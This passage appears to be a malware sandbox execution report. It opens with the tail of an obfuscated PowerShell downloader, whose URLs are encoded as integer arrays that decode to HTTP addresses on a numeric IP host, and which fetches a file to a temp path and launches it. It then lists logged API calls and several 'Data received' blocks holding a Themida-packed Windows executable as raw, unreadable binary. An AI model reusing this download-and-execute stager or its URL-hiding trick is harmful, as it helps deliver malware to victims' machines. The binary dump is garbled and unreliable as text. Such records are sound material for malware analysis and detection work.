$gpdHJmGBeHRamC = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76707,76713,76707,76708,76693,76701,76643,76642,76638,76693,76712,76693));MnCAu $PXnzJ $gpdHJmGBeHRamC;XszcGdVlHyMMWW $PXnzJ;};$oaxCdtTRdtQjSGzhkBM = $txkviPAwby + '123.txt';If(Test-Path -Path $oaxCdtTRdtQjSGzhkBM){Invoke-Item $oaxCdtTRdtQjSGzhkBM;}Else{ $OcHRVIXAgnJxIm = QXRFnJUoDIK (ZSExtBzusbrVsk @(76696,76708,76708,76704,76650,76639,76639,76644,76645,76638,76646,76647,76638,76642,76642,76648,76638,76644,76648,76639,76641,76642,76643,76638,76708,76712,76708));MnCAu $oaxCdtTRdtQjSGzhkBM $OcHRVIXAgnJxIm;Invoke-Item $oaxCdtTRdtQjSGzhkBM;};;;;}XeKyUELvjZOVnMLkCD;" uac
filepath: powershell.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\\I8Z7Joxb0y.bat
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\I8Z7Joxb0y.bat
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Wed, 26 Apr 2023 22:41:50 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 26 Apr 2023 06:26:49 GMT ETag: "5b5c00-5fa3753317e9a" Accept-Ranges: bytes Content-Length: 5987328 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL–ÀGdà  Z ÜÄ! € @ À[ôÒ[@€:€ P€ ØØ ` Z  `.rsrcØ؀ Ú^ @@.reloc ` 8 @B.imports € : @À.themida N  N< `àÉúԟI@ǟAǟK@̟ôԟIVǟJ@ǟH@Ǚñ£ÀŸY‰ÔŸI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟI@ǟó©ÖŸIJݧF@DžÚLǟO¨ÐŸIJé±K¨ÑŸIJé©K¨ÒŸIJÁ§M@Ǚ£Aǟº±ÈŸÃAǟH@ǎ©)!ŸI¨ÓŸIJï‹I@ÉíH@Çï¡OǟO¨ÍŸIN6ŠI@ɅOòٟIð7‰I@ɄN¨ßŸIJËH@Ǜ¤¿àŸH@ÇíšAÇï½ßIBï·I@ɈÄ[ǟHUȉ¿]ï¶I@É=@¨ÚŸIJï´I@ÉH@Ǜ×BǟMûäŸIJEžI@Çæ¦ÀŸCªÀŸHB›LN·²±ÌŸqAǟK@ǎ½Kå©AǞ¬ŸILï°I@ɄڡÀŸCT2¾I@ɂ@ ÀžI@6½I@Ɇ©ÁÀŸI÷ãŸIJï»I@Éí’AÇïæ®ÀŸCSÎMOçgJ@Çì¯ADžºNȎLI6¸I@ɱòðèŸIJ6¦I@Ɇ¸NÈà£ADž·ä7§I@Éà¢ADž@_6£I@ɇ@÷õŸIJÞì§ADžºOЙK^Áàð÷ŸIJЙæ±ÀŸCfԎO´ÏŽO÷ñŸIJ›†æ³ÀŸCJ¥„@´Î†æ²ÀŸCd¦„A´Î‡æ²ÀŸCdÎ¥H¨ÀŸK@]Ÿ¼4ÀƒI@ǟK@çŸ)À…I@ǟK@ٟÀ…I@ǟº±ÂŸ´AǟJ@ǎۜÀŸÙ©óŸIJ2«I@ɅOB6ªI@ÉëJ@Ç´£Aǟe‰ÔŸ ·PH@ǟ8Aǟåœ9ìÝî5¡ûî3àÜó#úÚ·úÚð=íêîúèí-í¥¡5ìêð2ãàãô¿ÿî2ìàð6ҝ·ð¡™·ð£©Œ=ãÝþ2ú”÷-êÝó!㥡êëõ)ü‚î9Ëæô-á”ãÿ¨è¾#ªŸ²ù¬îðא¬Úý-⧓-ìæþ2üìüöÍÜ÷<æäîúÚð=íêîúÝCǟIAǟI@ǟIÛù‚ Ͻù±RI@ǟ~Aǟ¿þÀïIùÀéIýÀåIùÀåI¼ÀáIõÀŸI@Ç¿¹‰ÔŸÄ+pÖÿ•ýS×é(ÑD{Xši %c„ë %0«[’åF+¥án _BýA]¦Á¾(Û?îáeú ö;5 À“yÔKù¥êÛÛàÞð/ÊÆ ë,uv+B$û%’¹xŽV‡ƒqýßU W©Þ0¢ðh<Ù`·E÷eÁwåΡK‡Èç2µ“×fLÜûRýz~XàènóÏ«žkrµ6Û¦ü„îzó¶×«oÐ>‹Ç-ÜrüsÊßîU­±[}WO”6IôL'åÙbïêšV'M"à¯X™«‘×*uú@)òu¨b¨øDÆ5 Šƒ³cQ7©GÒkšP:¹Dšî$_‘FÏ>3Ô-?ƒß½vû49 wæžE-ǡò·ãöo»í‰E=b›qŠžì0md=ºÂ›ÑR¢¥RîØF X|8+½½B™ùÝX&â„È*3ôfm ´7֊Æ.égˆDډ$yë½ð Ë÷#c(zYÞ­|ýTÍ}h_Ó ŸE—:š»()ÿ,%Þ<œ?)c«K¶ÌÉ•!“ºþÓ~ÐÈ꣼åށöB¿Ž-øÿ5+ FàfÈÚ9M»ËÿE­Ð„Ò;\a¹Gñ2»Ã¥<­¼¸ð¹KP!Iá,í +læ½ ^ÚrZn¨â "Q%;ËÝaÙ¤ÖhËÄÊ\žùÓ¡2Wþ¶ëúùIÉ£æê.LÔ)¢C‰œTn,Dl,O4Ð|»69µMÒYÅ|Û:á€VU6ŠŽÖCkÇ" 3{9Ÿ9wƒàÒ¿ê7MvàÒ^ Ž8^"‰| EÌ|zmGËÍÚwÊ:7 ´‚‹_eÁóÞ±ÇY2=3•HÇ=uDø ֚Û÷äÄN.“!5<<ÚÆÞðNÀñûsÎÖÔ2 ÎNel2~òØMD§f’¯UÊ{,µ97f8€YÝnw H³è5åÃÔ$~<}¯ÿ$Ð&jaû ßÜWPNú;¿%´&ÇùSÇvœÆ—Ö
Data received &Y±%Ù4ž×X¥çÅÕ+Õ¥âª³;õ·ÀyÏä0#þ ÐöŠ¨ =$èú¬k7÷\ª˜Ü ÙùR˳ ëÌÏ{\ýÛ8Í}R¡<­Òÿ‡´õå€Ëà™v±d.”2{ïúÁñÊG¥Íu¨mŽŠ°ü®"dòó“*@éÔü»×¶’Q›I:T÷ùÊvÆæN$~LAhœ}eBË' &Ð9å*´yÜ!Ոáh;LêŒÕ>l0u³À@Xü=#”ö;õ··)t ©±2"uW½W™«Ë3Ióc!eÁ·®úl¨},!š)ØZž£Æô‹ÌÎSøæŽy Ù0çcôx]´o$Ì]é‡Þ§Äq±`¼_Í8ûýñ©w 3W¸Ûø=wYÒzèSV qƒ °«wˆvSB’3W¸®ÓÂs¥@¶áûjNÃz)™ÇŸÚí<ÖH7‹"șyþńgþHÀWéô|ÈZThœ³”œ¤ ÈÏ¿fxW…?õSX/.7ó¡ÑìFS’?ƒ!Ö<im×â–yiÆnz¬ÒN<M•t˜õ@WØ.àå½>IJ±ešøÛ¬ˆ“ŠdÁ¥ßïqÊ€Õ ~±-¼©¾<cIe7¡÷uƱ¤w^"ñ¢Y5TщÀ¹íXZk·#ÃÞ¹°2¤˜Š|pãÃ,øH¶zÝÑìYv×K¤ün~1Tìı¥ {7ðõ‘PM÷ª®ËA WàŽþ[¨—SƒgâbÏ=åҜà(¤¹¿^O½ztk‘av¾ö(Œç6Ýñß_L3ጠsÜüÀgID¸¢b.·µèX—‚Ÿ³‰£\Ù뜔ÑXÄuæ'aL¨+)Ì¢`„S…x1©M]­Vot´E0¿a®œC §8Ýy"ßúa¸¸ )ø|þýN­Õóž0Œˆý~lŽ áö•<ß«M¨“΂Ô5Ï ]~q!õzD3[ø*„Ÿ [ #ÌX¯1/[ÊϺ&âû’ÿ2œš{òf3@ZID}_Ù®¤]®r³­¬&Б@„€]6úÓJ…ŸÝ&Lkä‰$&¯0¥O»ú̎5U`kã0¶øþš×¨‚žSs×JŽÑ9 ¶òyMr'rȦ$=mÄÑPډarA›‘4¬?¹2·ø b‹”]JŽ¸ÒçFþ·€¨ ödÍwl‚#±ã }vøš–kˆ‹àó‡Ò÷‡’* ÝHÉm;•W©\4µXAÁ‰-Þí â©¿.ûˆzJ0°µˆÓ»H7àb”?.í7H5UÆzc·ôd(ݹàÀŸ÷Hh@i8ˆ;o‚c‹¿#úžPW”ªAÆÈ š™ ©"á«eÇÀ0P»?‰ þÌ£ÔÊð*êz¶P›7‰L›~¦Øë F[úÑq_¸ÅöI_Ÿl1Ê Mæºãž1ŸZ<dK÷»LŠQâ]›Ð¡?K` E¶/{¡p(2v¦_èPj4¶Dþú¹ü{ê¼~(´Öœ €დ¥y¯^ø˜ØÇO€€æ©-ñsÊ0m¿8Uõ ù×¾eG÷½”åøc¾“ä„ó´HÀàøùq±C§¡ƒ9ÿa#€1½êÈ 8¾ìyߜñ“CîþúùŒ¬|+¬]³ h#N¦P6ž^¢¸eÿŸ3r8UŸíñ ÷ûîÞ@û€s¯¿ý¡70òntîî° yé>föö¤F“ t5!ÌÐWkX_®Va_Hƒ;Ø16ܧµß2  ¾½¶†Ë¨(¹7«{%¼<FHTš;;—]NlyªbžvØ‘¯ü4䢧ÉØãVsìÑúGn.$|!sŠP2;Ü=!$ZåV<÷U4lcr$O/3üøgì4p1º[¼4©eF?Î𹠝Ã÷ôQ´¥8Jž%ÿ…Í KpS<>¬ÎŠ1‘çcw|\1„ý`k\RÌ[<“e_g»Z@T†G…lX.‹ìÌT¿¦Ö|ÊýžÐÔ¼ßæ‡m ¨Ï»ÁWøKû]ȃ4 å b–±7êjéŽÙAn]õO¶–_?Žp˜ú§ù^eЀä.BÙ0 vp0Á? 8¯.}ï˜ÞϘ/Ú¡t¾¸|!73EöÎú[Ãú|,Øâ¦ßD®D05vèŸ'´+ízq(FبVtßÖM²*¦‚«ÕBLªã8kñêêdÎø_Êh¥ ZØ8`_#V¿ fœ7×àîðÕÏÁýòŽ{îZVvå `hM=cp´n,ÅC¶3R KçêúÜèù؎ZÀMÆêc=Æ7EÀ#¨‹çÊý湏Õg¯s¦ü½oԇ¦#7૆¶þpôDþ<’Q~ HK²¡Ä̮ЃM¢_>l˜³…DŽC¨ÔËú*’ Á£wyΆü½V…]° c / (O~‘üzˆi³TFÍ!#»R•”˟»éòµŒ²íû©+Ø iHõŠÛ…tg ½HfÜxû3›Ød†Be9ykô䶧‡>ø²Ï˘Q˜swÅà¥q\B›·+YCÒË=V9 ^Y­¥Õ÷~b‚$ÙöÓ5’ôk^3Z8 L!wt)‰f“‘ †z³®@x«üÍJ[KPÈð™,[ðûr¯ÏÉRó¾Wæ[UÀ+É®ì¿Ñ·ù±ë0áSÂ×ÊÌë7÷cü*<é6Xó‡h¼ühÊ»ºéïxrvŒWîG¥vu‚©²ó_ÆêZ¬ÍWì8‹IR?A .4w’ÚïE­‚²pC^ö¢ðcP3‘P¦®9B±ÐW$åpžkÓ} ÿ椓$0Híèi1?˜ªp[$Üw$Q„«°EΓ‚w:ÃïH‘ȼvLrr‡0‰ye;Ī&‡…töf¯èñë”FIÒÃõm†í4 B/ŸF{_ÇYnäMýsl*éøp†{`¢.ÕÁ¢*ìûÕùäË3Ð —ÝŽmpžW“Ìz™a®ã´Ô„RGƒ^†iNk˨òï«?’/ €Þ0t¨ÑäÞ>ð¦ä+Ó%à CʽU,HØܱ+ª•¸(u4ù\‹õÔr FÖ¢0óv…qQq Z¢…ÓÏ¿'Á ž¿ u­—?ßÜÛ|cúEøÀ»“œptfX„ œX Å_ü­huL”}ì\"㮒~»]!ôÄÆY±,b\3o;Aþ¢I;Ì š ÅSncZ#嘞ïm›Šš­=¿ù7v­YüÁmA‹B êAñ ÐtÎjËL´Œ>‚ê-;[u¿ óXÌÛÁåÞ?§s½ˆ¼B>|âÞÖΦ]V°É‹oÚÑAÂkY¿í7èCk*ÓÄ1Ïâe² žØûMôùÒìу9t#@Êÿ¿žå˜sdíÆÊ¡æªm«æßîÀ“ı¨*m‹w7'Â=æ¤$-uÊÔάfÚR8TeƒO/ô—ñ7‰PB…W«—4ÊY†DQWÎ+9|&ìׇًÑ`Zù… •,È#(vÏìb÷JOV)mj TƒACۉ/–ä2+îî1" Ml€¸‘Á©æmx7bTS­éjX´Þ§Ò)øͧ÷ðWñ~ügò½Z*Û€=%xsšèð$ý,£.ûq~¨H=áÆ¿Ÿ`j¸¢…¦ân£¦õb¯Â'ó¬ .^ºSé/½*üþ ©s üÁh’þ@畽äOöF¶Ñíõ3õ£ÓM$$ǁ.°+yÅÐôÆé¥T)‡./;KEHw€Ž’àق*ïÆAÀLìÏ©—ˆÁÁDæ‰ÞúLí'®À;6.…i¤PÌ·
Data received µŸ³tE¹¸Sö ³zçó/¶g½êÌZ„÷TÔ6r_á{]óæƒËóPD|ïÊg¸@ aYy4ÓMhSvFÞu$+ÌKE×U¶1’o%%Êéx³€Yj?N,qÌÓ ÝÎõÿ´ZöX:U҄¡™oI‚ÐóãYq”ëµMÉvw’‚´¶:´;Š?ÕV;WíÙjc²Ñ¦‘ÇO¼. ×D¹†f+Œ´`°ÌÄÓÇ{`vSú’ý/© ª Èümqqç-G`IÂàJ}µF}Ž˜‹³•€‹.œ³ålŠ¾ý 4ø^®~d‹!—LþíMÄ¿Šøw¼þÑÛ7Kž¸OlAŸ.kkÀFÿ2̜¢É;DÝLÿu;ùX„uܑëù>  5ƒ`óQÃÿÈêß©ð|cÄàVSÔµm6‹¤ãFó9š"!ˆî¡·\Ïâ{õçõ֛Á¼‚Ÿ6±™±AeCÞ›Ó¦Ç¿c ¨©°ðv@œPj½â#ôe»b}Rcgø묓6AÁ,\äE#Ç¡ýT¼¶Jìú©­ù\é‰0ïÒãj2 vðÚ8Š]Í·ð~ãQþêç÷WFšLùÙº$ÙÜìÖÂê¶zæÎU€ä±ËÞ)”˜,¨Ÿ¢oßG8 † +•+ÈûÙ-•,Òü"å]m7¶Øë؂ōÑêÆNy»+¢ªmpcŠØWÃSMµ:ºi3yÖëéy$î@¥²r>Ÿ•©ï@kê‘ÓA̛3²0VÔÃõÏNj?-x ³´ørıPN€†8¢QG­V"Òÿr± L× ³‡xJëNÒéòÔ.ê®<cÀ?kmôIïSÎÈN“³™az…÷4(i®0Fù2·5yá¶Yê&*µWŠ±¿÷²5^¡º«¥e[ŠÚDà‡ú²G‚¶½–‰ä±º’X—zʁç¡Uœ1y íq,,.yã#4”pŒµeE—½wüqYÂÖo+qg!y‹Jg¯•Tt¶pxY†ñF=Ǐ°Hó´Äõh‘‘2´,Ձ&9d¼o֘¼Ã oBôÙ¾Ëx‘õ #’ÝG²_“l¨—bà{Æ5b 6ŸàYÚ~¶Dgr8þ”ÿké9¯½šŽ’Ç÷”Á k7 ÁuÜwHn3ûÖÙ1šBém¡<ƒs“?NÎf¹[ê?/’‰9pƒY嚰iŠß”ú€Üʨ­Ok-ëB˜òß*"yçÂv_Aß~3œBƒëF~.º º ùd®¿@~>œ"‚Àž¦Ûê׎ã;4díݝ5BäÀNpwﬤ{m6'mšâÌrn{T}¬pÜ ÙÌ«—w‡¿¥Ïú ûƒh84¡Bà\$ϗùg2Í[öÃ;ʨ ³‘Æ°í½×B+Óý)GÐÿT»º_¥”N—?. ëkå‰1õ¯‰G'è‰Eð*C–ÎSi3ŠP7K3¼–ÌkÍTÈ/M£Pá×Þ=¦z$Î)ÁˆÜ)§û>¡ÿ=•²v»Ä 1}Œ·Š ÁapÀ‚Âs¨€¼¶›S×Ä ’%€QJÞR¤¸zÖ¥Wž½ @–Œ)Z–µ ‹©ñAiEJNÛà«#6ãý¦”(?«Cg›³-î(±Ÿd~˜k0RyÎd–0¦¨¥ð'¨öÏY&P) Ä«X@Gïé"ú-ºðµÓ¶[Ц²¬·yå渕™Ó‚R“^3‹)ùí_Ý!mq-óxtkÒì­¨_Žfo¶ÏÚæ$?yæ¤Þ§«U"(}CÉ<¿¹´£47•¼Šß°øÍïÿm<Ëò*aþ© pþõ`rÄ®tãë=ŸùïۊÑg‹IãÇAyöHõ; ——NaßÒ©×·—ZĀñ PÍ©ë0¸:Ci°ó‘€ÐH±ÛT¸Éb;"úÁÆ«Jñã¿ÜDnáâŽ2ø&x •9 %1\þ2Ø.û¥*p!žeZg¸‡¹£Jp wÞüƒšbžØo&š:Ð8µÞìÁз1Ìë%%µÓcmIÚғ›‘îFÖ.ÿöqÒ|ÌçÚSÞ "r èdº Tt<ìǖ{2O‡ß :Ó 6Õy©í©‹ì‡?N,*×^Á‰y­¶¼:Ï2~*Ç+¦sÆҗ:%G?ç<,•$ÛK=ë T»_–Î ~ oÇõT­ ,…ÄäAøÃöœ÷ÿe¾–P¯[¥_œa‚?sã4³×L q½3Œ<ìj¥Ú«w3NkhѼÞ(Br´,4—ëi4¤KÒ«rÈIf¶ŒMø‚ܝjR\WazÞ2Oò®>µ½/ë­p7ªUÁüC>ýÝÓÙë1’þŽOL0]¶ª1S¨_»ËE‹…Mn¾,ÙéŠËWÀ¬/¹~Xe¬ªâb„"A»Àöeò„Ñh[v=ÌwÅ3v?G}ø²ÇS6v·^€ºÕ½óP£Y»tvÏX­Iñ#²z.œ³ 31ºˆ5ˆàô e¼³0ž%’¨}2ԀWÝ´Ñ®ndƒ#KzîÆÂ$Dò[!ürՉê&FмîÐ@ óõõÊLºÍ”lҌÈ1‚™ÌLp2¶zc­øäabßñp4CR.JÄçV‹?âèÒ¶Ì&êÖTôÄÌõÏu/ýµã>>;H/οï ãzƒ$m Ž=G¢¢Ú£B´D´-Eö&;XÙÚGþ`ÞòÔ𠵦qBF~Å 5¾¦÷ЏÔ/­w‚?R~ Qœv4ûûI™KÄjÉ=öß@ æsQ¦T«ÌґÁqªbüo½-¥Sa´Ë¼“1ëvýaåœö(¶Œ-ÜíÒÈõ{5n³#ób¦6 ÎØ¿!®v=W̱ƒ¬&,Uiág1؆/…”Ûu'¡ðú>ۃxDṔ­úOÑ3ºßW{ \RRÒà[Ǚñ »Û¸%‡Âšú¸ Ð#vMß}@2j–nŽpömÚ詚#¹+ŒÔ½н§LùgÌ6»ly ¡Và–} !;¼hù2&¥]=Jò*>œ“­ûw©4Ÿ“o `X_:ü¶øG//n”qA(²@æöºD»©?p9*3-ҍ¶ðgËâêÌßrÕϹ+*¼Zô×Ì׀0§è.YõhìðHGžuõMò¼¦%x _ƾm¢2:öÁÝõC–©>£¹‹˜ª––g! $‡Ð“Mªr3‘gÄmtÁ+4.Ê3$`ôl8B„P×蓋6Ù׈çÓÒⷆV :L ®Œ£‘jËÐ[LKåD€þ´ýª1Çɹ³¥v: úFŽpXr³µ„rŽ\žÅ‚„LKgû4/:y(y]ç,G¬Œ.»CªC -²b¤D‘xþšß“˜ž¨Š«Æ$Ó=åY)1~Ûeé@¨©6 ¾¥APz5ܸäyߜj‰ßˆXb¸Üýº-ÏEôŠAo]’Ìû:¼{<8У% õa‡ÎÈ!Œ›ËppIIUj-¿×/©|B­üs>·®à:eH¬rù5:&æ~w8˦Õq?øN9`"[ÕRÌ;ŽÆ]Àd*×Õ߁µ[s«¤ñ³Í{Áµ7íW9s©ýýÆüÖÓïügU@§‰9Ð@ó×ü¢|Õ_Ñ·÷fôعvD”ùu*Ý'ÆϘ‚)¾L‘iåêúˆa¼»ŽHºî-秈‹ªöNÙ˗‚ÿ»“{¨dD³¢ïnsžD›£`™‚dåi»øPQgrèOu\k ƒ>c]´^|d±Øå¸ìÈlàÔ³Cåy!„–Õv)­n+šÏÇ
Data received ùú‰ ž×.‚АŠDA£†àQá­§Ö]R¤˜·ùR™æ[Ïso¢w›Ë *¥:.ÐË,q{ßd#•‹×ßކ¸EGÓ,+0L0›%dõ„îÑ4ÿے|½Pk°ÿðá#°eOΧ8gºž]íkØùö°ÿÔС..8pïG2Žóã‡v/HµâíÄáZ!z}s§=eÔÄšnél+s¯×"vþÔÝ]Ð7äëœ++“\Ø[S# žrvAÂb½NL¬G40èf“Y…•¡>ü@X8oÐÛîS84¼¾è)³™Ìì›4 ÙêÄk®h !3Mà”Hl1ÙÖf{6›_`¯ªÐWmàYªçî&5fup™ÑÏ$ŸÆöžïѺµµàb~5‚Dz|+œô)7Û=𣂔=èð2ØÈzO°à“¥àÀsI÷O6€_¤SŒ଺öˆí² âÑ«yêÏãé¬ã;’êù/Aœé´wH¶ñ˜ºšm5ÁüIŒì²^{±ë{4ÊÒ뒥º°¤@¡6FËê½·‚x`…v[“Îö\xúgÒnx*i2[8QïlJL¾?L6–Ù}™Ü^ax+W¹ºùpF×^,ôó±ü'ž±êÆ?µì“ƒZ@jÛÿQ'Æè@ÏZ“„?é᢯Z3j›Úи™ÚgxMRû‹³ʅ3uð¥ÞìA¼ë^ÚªTÿ§IɯòµW®Åt֜qˆ,C»RvÙ|£{3,+h‘:J´õU‡ hüƒ{@oMX^ãV8÷½‚ ±<ª_,†%oËM¡þ½]E)€‹”‰®&5 ‹=™Ï/ûQüÿ" Õ%¤ÈOµÛG¶9@-/(S'š²°ÆN•øs¡Çþy(â‚àÊÖÉÜi…YˆR!À<~N0ø_ø„¡ï)uñ&o.uã£ø@ƒJû<ì~S9ÏöŒêäs˜½Ú¡Ç•Ÿü‹_e3J@ÍDݸoæ–;®ŽçÞðkS–Ò·é"RÅQ‚ùW㙆ølUR(ÞÍò #þSø$¼L ‘x22ÆFÆ&ʾˆCJCe§Ü4¾ù,h:*c˜"-W:ÕÚD,äM¦ž0 ¯Ý 9·'üBPj¦†gApu–Ð*ò`¯ï”€äay¨Æ·ÖúŽ.&E€HýÇ)l¢áJr\Au¾"Õö ßó„Û>¸›nX½½XSnH¨F¯ŠRŽª¤9ùû6AMK}32?„£ÕªÝIg¬ÕõþNzdR5š•´ç Í¥lFô±¹i\g€¯p#µ=9ƒ/Bºñê/Ŕ"é˜"Ǟ¿äB¢é~«ïæUá`POÈÀ%{?çëñ} É¼ƒ —_μs©Sszpr2lÞOy^_ÄÃ}ò_êiäé™ïˆ£tbßî¡tm€ŸÝÜçñj‘ bfP`òž”uWƒh%1OÐûЏcÂ4žŠŠŸ-t‰ý¥%÷èS½x‰kíÈ&Î_ÙîªÙÖÌÒC˜å¬iâìís‡  {ʈþÜæb²†jžó7ÀB4 ШbÅî?¨É2óVŠHÞ¯”y¨©ÜåÜ`>ûKh^@Îö©àv¥:ÃÌòË º|ðc POìû)sNÿÉü>ó¤Œë ü–Û³À2!v{}÷’’©9XӇŽÛ2¨™Zÿ¹ÇàhERYÖõ :!ˆbº’Hðq„&à?H«ð(¡yÕ rá5d°tGwþ¸¢ßAÑ<iÀÀgÏ=¢þ)÷jbø™¯½ph«`-ˆeÔ={gßcD›¸a;ßç<‰°:½<øÐáJ– CýZ=oƒ§vÁ2‹6Uœ˜5ÊC–5+ǗÍ/´+b¡KÛív>ˆ¸…(Ö¤P2øµä4:µ«Úb}Êosψ¨¾DÞæ4_HýÅA„ 5yÃ5Ï¡ܒ´Úò*xÕC-ƔòÐ"ÎäŸ]ÑDÒò‚H(H`öîÝ°zAÆ †xç痙ˆ73QÙÃw%æDÒãE^»HÊÚÿGf±†'9‚øÍ«§0"(Kñ¬/¦aŽ Te°oº&¤ÿöà磥<§²µSÅ|Hs% \ŸÍK‹ ”†x„pˆC{ã- ~Ÿ‡¿d;wèsÖú`jä]PuÄCñnÁP „q¥(¸¨`ص,‘Õ`ð\mþ£¤Ð¯@9ȲØ 9Ú0h)‹-»j»¥ -Fi}㱈"U¢žKôîF³y­ÍWö6LŸè&͂Ž›—6’6»‰DÏk"Vì=žéásôéºëº\ÐYÆôë OËÕZuŽ«Pbd•\:ÌzXY_#óa,ŽÄųö<Å概¢¶Žž¸dæpÄÕbóœyñùë•ÓÒmk™¿eeû:G„À2ýgû0‚ѧ‘ó‰]¹Ž~žÉÄ6"æ?·ñ(XœvÅ&é"rg¿îf¥[Fž¶ #@Zl¦Äæ+ “4‚4Â{ºùv3˽·˜¦šoÀ õck*õ^Z½”Š¢už2âb¹粊ɯì˜"]‰„ÌaÔ;ÈtNíæ冰]9ŠH¾Ñí®z_?â¡Hžj³Ô°Ú“4b…ÁW 2Ê ÂVLo‡Ü馦õYɃû??)iå™H‡%‹Þ?Ú°în‹L²ë Ö}³$ ݯMa*m!3·Ê7ÞbqU´?9õ7R9,XåâÜÓKönoÓ Áଠ52†ªÌ¦ñSגQßóÎ>^·Ç5‘)ZfþOÿý|GAzyPÀ‘h6 ¸žaEíOÒa¹Ú܍føz%Ό6qç9KåÅ«¹7¯ ¾'×H›[:‰Ïö0 Éü|+ÚjGí²¤om7¦3‡øK`,uïaï !¡‰!x{(Ï#^{ZÔ$G®+€8ºNR'9™ã´o|—N9sº=;7ˆsõŒ>™%²|Dwô£«¨˜C«¦%úR(Y/åù<¾ÈoKˆğZsÿÞyÄÖÊåýác‚O±Ë¥ÈžpRbdúGóI›Lˆ„Ü$d-c4ëwD<B6ø-¢ËЯPï+þFG%0ž'‚üš89·(áðËõ‘wHY²u4+`4ö1 ψökrzˆ_Ëñâ›q—oGÆ­!~cå,:;—Wå:!a¤ìRÛmgžXZÑ }Ää;•iÙc†c4¸ À;d"7ñâ*½ˆÞ®°wZ‚³½/³¬•<d)/#‹P,Íé䘛óeîW–€HYCge¶‘‡rz¦CÜҔIÈ×øґ9Ÿ”%ÔI(=Q5ÔӬʡnÿM²’^™nbCUcÛ6<jÁKÇw_Š}’E‚Ë¡¹ˆ¥à™~æyòçâǬò¨qsh3%eæB-ò±ýSÁåoyÑ- ,Ö¿Jð*†p2n`[íªi°*¦ð²|Çú‰^¹™‘œhZê´È“Íbõj8g„ãð¦Á¦}MdÒòL:Yä*NA¯,êg™Œ‘A1ÖR٠ŁºÓYš~:åAg0 W‡¹æq”5§´cI¹š;ªÄ‹ªël¾øqRP#Ÿàó„¼CæZ–¥$aG (lN)œôáÔé~Ç# X†+ÿŠ·˜“8‰ÚגSœ™ÕþÓO³N~¨[_$lÚgðqHâ­C.ýï ømÉFGZ¥,æg!<0#)“õ5=禟¦€VŒÏ P”Þ²sÁJ>àDރ;]ѧ¡Õ0LŠÐ(‰ Aóÿ—Ca,‰áú@ˆ{1äu î"ÕLàÊ/ãk
Data received ÕñQ(’ ƒì \'RË°;‡¼ÏÿHÈmÐbu4V\á•á(ú‚C[† §Àø‘¶'î|¨ð,© Ù³â,O¦*`Cªö¾ ÕÓë È xHŽäœ”è«Wv²Qh÷ )Ô$¢Ñ{ú‰²PzßmòÆ}KMF]:ò‚àW¶¥YË2Þ°kûüïÅ7Ì ˆ F„†VvyG×9ÆAÃð™d5Ë`둔u¼f…@¨` 9apI+5 =ýBy°ÈZQ" ý°ÇŸ¿ƒ¼€ÓŸz®¤»·I>ƒ,0ÆeDª¥©ôOùdq’ph¼Ç¥ECÇÞ(ïâp} ¡¦¬åó Â1í]Å«})° zã5¬ìÄÿ–Ð0ÏïðµðãÓo›a`Özq™TùÂe;ÔO­Kž‰Å<m É:})‹zYÛ![³‡H)\°;f§ÍP¨’ÊWIþÓMHÊ((r˯öá®Z½…ªB 攍×h5sä½¾TºzNÍ:}_Ä®'®²ãË$» øj}ƒPâ’1k$ˇÁWtŸd! ü˜o‚^ÔyÁ îÉØ`ÿÏJ­v>ò·h6•“°¸ž•úÒ,Š® xÅ-ZS†L”xµ†•{΂ŽÛ9 »Ò†•GiIZ¢a…¨€¶v¾›ætùùÑÐå_œ5Зa.*ÿHä1åmvnjöõÿ½?’óÖAA¤/Êå¾áMvÄå[Œâ§ßçðè›:o?Fp˜ƒæ˛hçcú*QFïhSÁçaëÓMÔËïjRÀî¡,^M"˜é¦c.å[1´×±ñ$œÉ9ÐÍ×áz‘Ñ䘥½Ãö[$0p|Ö2¶oçáãêSÅÊY+±7›Æ”UŽ>æk³åxN Eø³õ8•¼3ð*ªêÉ8i„§€…Ž¸UÏlCÄ7êÓæ_™öKZóUÖG K,yf—Ž\ä×VĐ­‘¸x¡ Úé- k#ûqÿÚµ.šÕŽan’¶Ž¦ä£ŒáÙņ¥xð>H‰;EÉnBB×|-øÆYÜ͝ž«©,>“æÆ%¼¥º*2ç·QÕ¿%U˜qŒøt¡ ËbÝ?.é,ÁVtv&ˆ”ìBž›\icîGàÞí­½è’†`•¶½R­—½’©©ä¦»9J§xáS'þAw]ÐQKÁò¬íÈá«°· Ó(¼o‘êhǪ8ærUžZØ »Ïø°¯Ñ° KU?3Ïk”0¬±F vãû¯_ƒå)§ì,€ùÃóm5ÉOÆ!ÉD äk†Öý/Lo<[ö=”B÷˜éùc¶Ú©nÅ Ä *r”–”—ÿDJ‡ÀÏr˜ˆÑ#¹•F½ z8÷°ÀG™ƒ!,ýâ’ò¸cD(ƒk}Ò¾ü¨Q~·TšÃbJ<~/Àý¼Ë+ ]ۚŸ•è՟¦úwÿìÚû\’ >}ó×æ™üX«ü%Á[…/ÒשŒá${¯*òÑ©í™4 5õ-òöC3ыÆ‚ë‡Ëíß{ÎBúä_«-M˱±Ä dóòӘ¹Ú Ê¡Šœk"s:êeß>ûÍùËì\¤ zŸ?#äÐð™Cg|Èaƒˆ¦úF ëݔ?5BlóšxýWÓpÊ ÜôWÜãoœ¶¾Ý ¾™dÈ´zx¦žß!Ÿì/Û¨Q™ûp‘ek:}Æyhùæpì˜ОÎÔq²ÉÈ\õoTäš;8`@ÒºƒÞ>½.w"ÈXÒ`njOø/’žy½hüV «ÀK¤™ˆÁ/=Žp=O!H—–ÜDWŽk±CшԵY´_% )a÷l^¡„âÐ'ù±E¤=Ւ^à548W5MÛ¡XѼâ>gÔEU=ý&Pï#¬L.ê%7X}KwÓmŒK;Wjý^vt3fh’„Ôïňcè@ îEÀÚ±™¦ AÅV™vä„U ?vÅKÿõF”2H 